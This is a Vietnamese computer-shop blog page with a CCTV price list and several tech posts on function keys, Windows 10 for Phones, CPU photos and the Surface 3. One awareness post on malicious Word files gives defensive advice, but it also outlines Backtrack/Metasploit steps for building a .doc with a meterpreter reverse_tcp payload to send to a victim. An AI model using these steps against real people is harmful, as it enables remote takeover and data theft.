HÌNH ẢNH THỰC TẾ TỪ BỘ CAMERA Dahua CVI 2.0 xem trên phần mềm máy tính.

  Video xem trực tiếp

 Bảng giá :

1. HỆ THỐNG TRỌN GÓI CAMERA QUAN SÁT DAHUA HD-CVI Full HD 1080P 2.0 Megapixel

Giải pháp lắp đặt cho nhà riêng, cửa hàng, siêu thị, văn phòng, nhà hàng, nhà xưởng…

 

Lắp trọn bộ Camera Dahua HD-CVI 2.0 Megapixel
Lắp trọn bộ 1 Camera:    6.100.000 Lắp trọn bộ 5 Camera:  11.650.000
Lắp trọn bộ 2 Camera:    7.250.000 Lắp trọn bộ 6 Camera:  13.600.000
Lắp trọn bộ 3 Camera:    8.600.000 Lắp trọn bộ 7 Camera:  14.450.000
Lắp trọn bộ 4 Camera:    10.150.000 Lắp trọn bộ 8 Camera:  16.150.000

 

2. HỆ THỐNG TRỌN GÓI CAMERA QUAN SÁT DAHUA HD-CVI ĐỘ NÉT HD 720P

Giải pháp lắp đặt cho nhà riêng, cửa hàng, siêu thị, văn phòng, nhà hàng, nhà xưởng…

Lắp trọn bộ Camera DAHUA HD-CVI 1.0 Megapixel
Lắp trọn bộ 1 Camera:    3.500.000 Lắp trọn bộ 5 Camera:    9.700.000
Lắp trọn bộ 2 Camera:    5.400.000 Lắp trọn bộ 6 Camera:    10.750.000
Lắp trọn bộ 3 Camera:    6.450.000 Lắp trọn bộ 7 Camera:  11.800.000
Lắp trọn bộ 4 Camera:    7.500.000 Lắp trọn bộ 8 Camera:  12.850.000

———————————————————————————-

Ghi chú : Gói camera trên đã đầy đủ các phụ kiện bao gồm:

1. Đầu ghi hình 4 – 8 kênh ( có thể xem trên ti vi, điện thoại, laptop… )

2. Camera ( xem được cả ngày và đêm )

3. Ổ cứng lưu trữ hình ảnh ( 250GB – 4TB )

4. Nguồn Camera (Adapter)

5. Dây tín hiệu 10m/01 camera.

6. Dây điện

7. Khuyến mại chân đế, Jack BNC, Jack AV và các vật tư phụ.

8.  Khuyến mại nhân công lắp đặt và cài đặt tên miền xem trên điện thoại…

9. Tặng tên miền xem online qua điện thoại trong 01 năm

——————————————————————————————————————————————–

Quý khách có thể tự lựa chọn Camera và Đầu ghi phù hợp với nhu cầu của quý khách tại Website: www.hoangdiep.net Hoặc gọi điện ngay cho chúng tôi để được tư vấn chi tiết về Camera và Đầu ghi miễn phí

Bản đồ

CAM KẾT CHẤT LƯỢNG SẢN PHẨM VÀ DỊCH VỤ

Trung Tâm Thương Mại Hoàng Linh cung cấp camera uy tín hàng đầu tại Việt Nam Chúng tôi xin cam kết:

 • Sản phẩm đúng như mô tả trên website (về màu sắc, kiểu dáng, chức năng, giá cả).
 • Giao hàng tận nơi khu vực Lai Châu và khu vực lân cận
 • Bảo hành từ 12 đến 24 tháng tùy theo chủng loại sản phẩm.
 • Hỗ trợ, tư vấn, thông tin, giá cả, mua bán sản phẩm hãy liên hệ qua: Yahoo, Facebook, skype hoặc Hotline : 0948.100.700 – 0944.525.867 – 0961.525.867
 • Địa chỉ : Thị Trấn Tam Đường – Huyện Tam Đường – Lai Châu.
 • Website : http://hoanglinhcomputer.com.vn & http://hoangdiep.net
Read More
Thủ Thuật Kinh Nghiệm, Tin Công Nghệ

Dùng Windows đã lâu nhưng bạn đã biết hết chức năng của các phím từ F1 đến F12 chưa?

Bài viết trước chúng ta đã có nói qua về các nhóm phím tắt mới khá hữu ích khi sử dụng Windows 10 rồi phải không nào? Bài viết này chúng ta sẽ cùng tìm hiểu tiếp về nhóm phím Function (F1 đến F12) trên bàn phím có chức năng gì và khi sử dụng kết hợp với các phím Ctrl, Shift và Alt thì nó sẽ như thế nào nhé.

Danh sách các chức năng của các phím Function từ F1 đến F12 trên Windows

Phím F1

Hầu như tất cả các phần mềm ứng dụng đều sử dụng phím F1 là phím tắt để mở chức năng trợ giúp hoặc hỗ trợ người dùng. Nếu bạn cần một ví dụ cụ thể, hãy mở Office Word lên và nhấn F1 xem kết quả nhé.

Tương tự, nếu nhấn tổ hợp phím Win + F1, cửa sổ Windows Help and Support sẽ xuất hiện.

Phím F2

Khi bạn chọn một hoặc nhiều đối tượng trên Windows, nếu nhấn phím F2, bạn sẽ có thể nhanh chóng thay đổi tên của các đối tượng mà mình đã chọn.

Trong Office Word, nếu sử dụng tổ hợp phím Alt + Ctrl + F2 bạn sẽ có thể mở nhanh một tài liệu mới dễ dàng. Còn với Ctrl + F2, tính năng ‘Print Preview Screen’ sẽ được kích hoạt giúp bạn có thể xem trước bản in của tài liệu, cũng như điều chỉnh lại bản in theo ý muốn.

Phím F3

Phím F3 được thiết lập trong hầu hết các chương trình phần mềm trên Windows như Google Chrome hay Internet Explorer… có chức năng khởi động hộp tìm kiếm.

Trong Office Word, tổ hợp phím Win + F3 có chức năng tìm kiếm nâng cao. Còn với tổ hợp phím Shift + F3, bạn sẽ có thể nhanh chóng chuyển đổi định dạng văn bản được chọn sang chữ hoa hoặc chữ thường.

Phím F4

Trên Windows Explorer (File Explorer) hay Internet Explorer, phím F4 có chức năng truy cập nhanh vào thanh địa chỉ. Còn trong Office Word, phím F4 sẽ có chức năng khôi phục lại hành động cuối của bạn.

Khi nhấn tổ hợp phím Alt + F4, bạn sẽ đóng nhanh cửa sổ đang mở. Còn nếu trên màn hình desktop không có cửa sổ nào đang mở, khi nhấn tổ hợp phím Alt + F4, hộp thoại Shutdown sẽ xuất hiện.

Phím F5

Nếu bạn đang sử dụng trình duyệt web, phím F5 sẽ có tác dụng làm mới hoặc tải lại trang web bạn đang xem. Hoặc nếu đang ở màn hình desktop hoặc File Explorer, phím F5 giúp bạn Refresh lại mọi thứ trong đó.

Nếu đang sử dụng Office Word, phím F5 được dùng để kích hoạt tính năng ‘Find and Replace’. Còn trên Microsoft Office PowerPoint, phím F5 sẽ có chức năng khởi động chế độ trình chiếu.

Phím F6

Trong trình duyệt web, phím F6 có chức năng đưa trỏ chuột vào thanh địa chỉ và bôi đen. Điều này giúp bạn nhanh chóng có thể nhập vào một địa chỉ duyệt mới một cách dễ dàng.

Trong Office Word, tổ hợp phím tắt Ctrl + Shift + F6 có chức năng nhanh chóng mở một tài liệu mới ở một cửa sổ riêng biệt trong khi đang soạn thảo.

Phím F7

Phím chức năng này hầu như ít được sử dụng trên trình duyệt web, nhưng trong Word hoặc các chương trình phần mềm khác thì có nó chức năng kiểm tra chính tả và ngữ pháp.

Tổ hợp phím Shift + F7 trong Word sẽ mang đến cho bạn khả năng khởi chạy tính năng từ điển.

Phím F8

Phím tắt giúp truy cập vào chế độ Safe Mode trên Windows khi đang khởi động.

Phím F9

Phím F9 trong Word có chức năng làm mới các tài liệu. Còn trong Microsoft Outlook, F9 có chức năng gửi và nhận email.

Phím F10

Trong một số phần mềm và trình duyệt web, phím F10 có chức năng truy cập nhanh vào thanh Menu Bar. Một vài dòng máy tính sẽ có tùy chọn truy cập vào BIOS bằng phím F10 trong lúc khởi động.

Tổ hợp phím Shift + F10 có chức năng thay thế hành động nhấp chuột phải vào tập tin hoặc liên kết web.

Phím F11

Hầu hết các trình duyệt web thiết lập phím F11 có chức năng truy cập/thoát chế độ Full Screen. Trên một số dòng máy tính, phím F11 có chức năng truy cập vào chế độ Recovery Mode.

Trong Office Word, Shift + F11 có chức năng thêm một sheet mới và Ctrl + F11 có chức năng thêm một macro mới vào bảng tính.

Phím F12

Khi nhấn phím F12 trong Office Word, tùy chọn ‘Save As’ sẽ mở ra. Còn nếu sử dụng tổ hợp phím Shift + F12, tùy chọn tự động lưu được kích hoạt.

Tổ hợp phím Ctrl + F12 có chức năng mở tài liệu mới và Ctrl + Shift + F12 sẽ khởi động tính năng in tài liệu trong Office Word.

Nguồn ST : Genk.vn

Read More
Tin Công Nghệ

Xâm nhập máy tính qua file Word

Những thủ đoạn mà tin tặc sử dụng để xâm nhập máy tính người dùng với mục đích ăn cắp thông tin, dữ liệu. Cách thức phòng chống và ngăn chặn
Backtrack là công cụ có nhiều tính năng cho phép tạo virus tự động , được sử dụng phổ biến hiện nay trong cộng đồng an ninh mạng

Hiện nay, các tập tin văn bản Word  (.doc hoặc .docx)  được đa số người dùng máy tính sử dụng trong công việc và học tập. Chính vì định dạng văn bản này được dùng rất phổ biến nên nó đã trở thành phương tiện cho hackers sử dụng đễ phát tán virus hay trojan. Phổ biến nhất và  chương trình  Microsoft Office 2003 và 2007.
Các hacker sử dụng các công cụ như Backtrack, Kali-linux… để tạo và nhúng các loại chương trình, mã độc Malware, Virus, Backdoor vào các file “.doc” hoặc “.docx”. Thời gian để tạo những file có chứa mã độc này chỉ mất 5-10 phút .
Với công nghệ cụ tạo virus tự động như Backtrack, thì một người không chuyên về bảo mật mạng vẫn có thể dễ dàng tạo được những virus, Trojan, …. Và phát tán chúng qua mạng xã hội một cách nhanh chóng.

Hackers phát tán qua email, diễn đàn hay qua mạng xã hội các tập tin “.doc” hay “.docx”.
Nạn nhân giờ đây bị hackers kiểm soát và dùng để thực hiện các cuộc tấn công DDOS hoặc đánh cấp dữ liệu ,thông tin tài khoản của nạn nhân.
Máy tính được cài các chương trình bảo vệ có bản quyền với đầy đủ các tính năng Internet Sercurity sẽ trở nên an toàn hơn.

Đối với người sử dụng , theo khảo sát riêng của trung tâm ATHENA, 90% người thiếu kiến thức về an ninh mạng, không có khả năng nhận biết được các nguy cơ an ninh mạng khi truy lướt web, truy cập Internet, và  thường cho rằng virus hay mã độc chỉ ở tập tin dạng “.exe”  nên thường không lưu tâm đến tập tin dạng“.doc” hay “.docx”. Nhưng thực tế các tập tin này lại tiềm tàng chứa đựng những rủi ro rất lớn.
Với số lượng người sử dụng mạng xã hội hàng chục triệu như hiện nay, thì đây là một môi trường rất hiệu quả để phát tán các chương trình mã độc. Nhiều nạn nhân bị mất dữ liệu mà hoàn toàn không biết được mình đã bị mất và mất như thế nào. Theo ghi nhận của ATHENA, đã có trường hợp doanh nghiệp bị xâm nhập và lấy đi những dữ liệu quan trọng, thiệt hại kinh tế lên đến hàng trăm ngàn đô la Mỹ.
Để phòng chống các  trường hợp này chúng ta phải cảnh giác và áp dụng các biện pháp như luôn sử dụng các bản Office có bản quyền để luôn được  cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp. Không nên mở các  file Word từ email không rõ nguồn gốc, luôn sử dụng chương trình diệt virus trên máy tính, thường xuyên cập nhật mới nhất  chương trình đó, cập nhật bản vá lỗi mới nhất của MS Office 2003 và MS Office 2007…
Đồng thời, khi  sử dụng  các chương trình diệt virus của các hãng  bảo mật, chúng ta phải sử dụng phiên bản  có  chữ  “Internet” ví dụ như “Kaspersky Internet Security” ”Symantec Internet Security” ,“AVG Internet Security 2014”.” BKAV Internet Security”… Các bản được gán chữ  “internet” sẽ có chức năng cao cấp hơn, giúp chúng ta chống được việc  điều khiển từ xa của hacker mặc dù máy chúng  ta dính phải  lỗ hổng bảo mật, hay quét các lỗ hổng bảo mật mà trên máy chúng ta mắc phải.

Các bước tạo và nhúng mã độc

Đây là tóm tắt một số bước để tiến hành tạo mã độc và nhúng mã độc vào file “.doc” mà hacker thường sử dụng với chương trình sử dụng Backtrack

Bước 1: Khởi động Backtrack.
Bước 2: Dùng lệnh show options để xem những thông tin cần thiết.
Bước 3: Chỉnh tên file cho hấp dẫn bằng lệnh set FILENAME (ví dụ : baocao.doc)
Set payload windows/meterpreter/reverse_tcp

Bước 4: Thiết lập LHOST (Local Host) và LPORT (Local Port)

Bằng lệnh set LHOST [ip] (lấy ip của máy bằng câu lệnh ifconfig)
Và Set Lport 4443 (port này không được đụng tới những port của hệ thống)
Cuối cùng ta exploit để tạo file virus gửi cho victim (nạn nhân)
Về tác giả: Võ Đỗ Thắng – Trần Lâm Mẫn là các chuyên gia an ninh – bảo mật của Athena, Trung tâm Đào tạo Quản trị mạng và An ninh mạng quốc tế
Read More
Tin Công Nghệ, Tin Tức

Microsoft phát hành Windows 10 for Phones bản build 10051, hướng dẫn cập nhật

Microsoft phát hành Windows 10 for Phones bản build 10051, hướng dẫn cập nhật

Vậy là Microsoft cũng đã phát hành bản cập nhật mới cho Windows 10 for Phones với bản build 10051. Ngay lúc này bạn đã có thể tiến hành cập nhật trên thiết bị WP8.1 của mình theo hướng dẫn dưới đây.

[​IMG]

Chi tiết những thay đổi mới trong bản build 10051 bao gồm:

 • Project Spartan: trình duyệt mới này đã được bổ sung vào phiên bản build mới, tuy vậy chưa phải là trình duyệt mặc định thay thế IE. Chúng ta vẫn sử dụng song song với IE.
 • Ứng dụng Mail và Calendar mới: hai ứng dụng này đã trở thành Universal app chung với Windows 10 trên máy tính, giao diện mới, tính năng nhiều hơn, cho phép thao tác vuốt…
 • Cuộc gọi và tin nhắn mới
 • Ứng dụng People cải tiến
 • Ứng dụng bản đồ đã là Universal app
 • Thay đổi giao diện đa nhiệm

Trước khi muốn cập nhật, bạn cần đăng ký để trở thành người tham gia Windows Insider. Để đăng ký bạn làm như sau:

 1. Vào trang insider.windows.com

  [​IMG]

 2. Nhấn vào nút Get Started
 3. Đăng nhập bằng tài khoản Microsoft và như vậy là bạn đã đăng ký thành công.

Trên thiết bị Windows Phone, bạn thực hiện từng bước như sau:

 1. Cài đặt ứng dụng Windows Insider tại Windows Insider | Windows Phone Apps+Games Store (United States)
 2. Chạy ứng dụng lên, nhấn vào “Get preview builds” > Microsoft account, nếu bạn thấy thông báo “no builds” thì nghĩa là thiết bị của bạn chưa được cập nhật vì hệ thống không tìm thấy bản build nào mới cho máy của bạn, hãy kiên nhẫn chờ đợi thêm. Ngược lại, hãy tiếp tục.

  [​IMG]

 3. Giao diện tiếp theo sẽ cho phép bạn chọn Insider Slow hay Fast. Với lựa chọn Fast bạn sẽ nhận các bản build mới nhanh hơn (khuyên chọn cho ai thích vọc sớm) và Slow nghĩa là bạn sẽ nhận chậm hơn nhưng ổn định hơn.

  [​IMG]

 4. Sau khi hoàn tất bạn vào Settings > Phone Update và tiến hành tải bản cập nhật về.

Trong trường hợp gặp lỗi, bạn có thể khôi phục về bản cũ theo hướng dẫn tại đây. Các thiết bị được cập nhật lần này bao gồm: Lumia 1020, Lumia 1320, Lumia 1520, Lumia 520, Lumia 525, Lumia 526, Lumia 530, Lumia 530 Dual Sim, Lumia 535, Lumia 620, Lumia 625, Lumia 630, Lumia 630 Dual Sim, Lumia 635, Lumia 636, Lumia 638, Lumia 720, Lumia 730, Lumia 730 Dual SIM, Lumia 735, Lumia 810, Lumia 820, Lumia 822, Lumia 830, Lumia 920, Lumia 925, Lumia 928, Microsoft Lumia 430, Microsoft Lumia 435, Microsoft Lumia 435 Dual SIM, Microsoft Lumia 435 Dual SIM DTV, Microsoft Lumia 532, Microsoft Lumia 532 Dual SIM, Microsoft Lumia 640 Dual SIM và Microsoft Lumia 535 Dual SIM.

Diễn đàn sẽ cập nhật thông tin mới nhất trong bản build này đến bạn đọc.

Chi tiết: New Windows 10 Technical Preview build now available for phones

tdiddy.2
TechRum
Read More
Tin Công Nghệ, Tin Tức

Bên trong một Vi xử lý (CPU)

 1. Bên trong một Vi xử lý (CPU)

  Đây là hình ảnh một giảng viên phần cứng khám phá bên trong một chiếc CPU intel pentium III.


  Mặt sau của con chip, có nhiều chân kết nối với con chip trung tâm


  Một mảnh của bộ vi xử lý đã được bóc ra


  Các chấm trắng trên con chip


  Phóng to hơn


  Đây là một phần của bộ vi xử lý với các lỗ nhỏ, chấm trắng trên bo mạch


  To hơn nữa chúng ta có thể thấy được các bóng bán dẫn kết nối trên một bản mạch kim loại trên con chip Silicon


  Phóng to hơn bằng kính hiển vi ta thấy nhiều đoạn mạch

  Cấu tạo phức tạp của một con chip pentium III

  Bạn có thể tham khảo nguồn tại đây

Tin Công Nghệ, Tin Tức

Trên tay và những ấn tượng đầu tiên về Microsoft Surface 3

Trên tay và những ấn tượng đầu tiên về Microsoft Surface 3

[​IMG]

 1. Tuần trước, Microsoft trình làng tablet tầm trung Surface 3 với trên nền tảng chipset Intel Atom. Hôm nay, techrum mời các bạn đến với bài trên tay thiết bị này.

  Bài viết được lược dịch theo bài review của Neowin.

  [​IMG]

  Với những ai từng sử dụng một thiết bị thuộc dòng Surface thì sản phẩm mới này cũng sẽ đem lại trải nghiệm quen thuộc tương tự. Surface 3 là một tablet vuông vức, đi kèm giá đỡ máy và bút cảm ứng. Nhìn chung, đây là một thiết bị đẹp mang hới hướng hiện đại và năng động.

  [​IMG]

  Trong hộp của Surface 3, ngoài một bàn phím Type Cover còn có một dây sạc mới. Microsoft đã lược bỏ cổng sạc nam châm và thay vào đó là cổng sạc microUSB. Có thể nói, giờ đây Surface 3 đã dễ dàng sạc hơn với bất kì sạc chuẩn microUSB nào nhưng sẽ sạc chậm hơn do hầu hết các cổng USB hiện nay chưa hỗ trợ nguồn điện 13W.

  [​IMG]

  Mặt trước máy là màn hình 10,8 inch độ phân giải 1.920 x 1.280 đạt 214 ppi và có tỉ lệ màn hình 3:2. Đây là một điểm đáng khen cho thiết bị này vì tỉ lệ màn hình trên sẽ thuận lợi cho các thao tác máy dưới dạng một tablet.

Ngoài ra, sản phẩm có một logo Windows cũng là nút chức năng và camera trước độ phân giải 3,5 MP hỗ trợ quay video 1080p.

[​IMG]

Mặt sau của máy khá đơn giản với một camera độ phân giải 8 MP hỗ trợ quay video 1080p và 1 kickstand.

Microsoft làm kickstand trên dòng Surface rất tốt, tạo cảm giác chắc chắn và vững vàng với 3 chế độ đặt máy.

[​IMG]

Cạnh phải của máy đặt khá nhiều cổng kết nối bao gồm: jack cắm tai nghe 3,5 mm, cổng sạc microUSB, cổng USB và cổng mini Display Port. Cạnh trái của máy là nơi đặt khe đọc thẻ nhớ SD card.

[​IMG]

Cạnh trên sẽ là nơi đặt phím nguồn và cụm phím tăng giảm âm lượng.

[​IMG]

Cạnh dưới không đặt một phím chức năng nào do đây là nơi đặt khớp nối nam châm để kết nối Surface 3 với bàn phím rời.

nguồn : techrum

eview của Neowin

Read More
Tin Công Nghệ

Windows 10 sẽ chính thức phát hành vào mùa hè này trên 190 quốc gia

Windows 10 sẽ chính thức phát hành vào mùa hè này trên 190 quốc gia

Như vậy là chúng ta đã có một mốc thời gian cụ thể khi mới đây Microsoft đã chính thức cho biết thời điểm phát hành Windows 10 là vào mùa hè này.

[​IMG]

Trưởng bộ phận Windows, ông Terry Myerson cho biết họ đang tiếp tục quá trình phát triển Windows 10 và dự kiến sẽ phát hành phiên bản chính thức vào mùa hè này, với 111 ngôn ngữ và tại 190 quốc gia. Cần lưu ý, Windows 10 khi phát hành chính thức vào mùa hè sẽ miễn phí trong vòng 1 năm cho người dùng Windows 7 và 8.

Bên cạnh đó, Microsoft cũng đang hợp tác với một số đối tác Trung Quốc để đưa Windows rộng hơn đến Trung Quốc. Thậm chí Microsoft còn cho phép người dùng không bản quyền nâng cấp lên Windows 10, vì thế có thể thấy Windows 10 là một canh bạc lớn của Microsoft. Chưa rõ liệu Windows 10 for Phones có được phát hành cùng thời điểm hay không.

tdiddy.2
TechRum
Theo The Verge
Scroll To Top

HELLO USER, JOIN OUR

NEWSLETTER BASEL & CO.

Be the first to learn about our latest trends and get exclusive offers.

We use cookies to improve your experience on our website. By browsing this website, you agree to our use of cookies.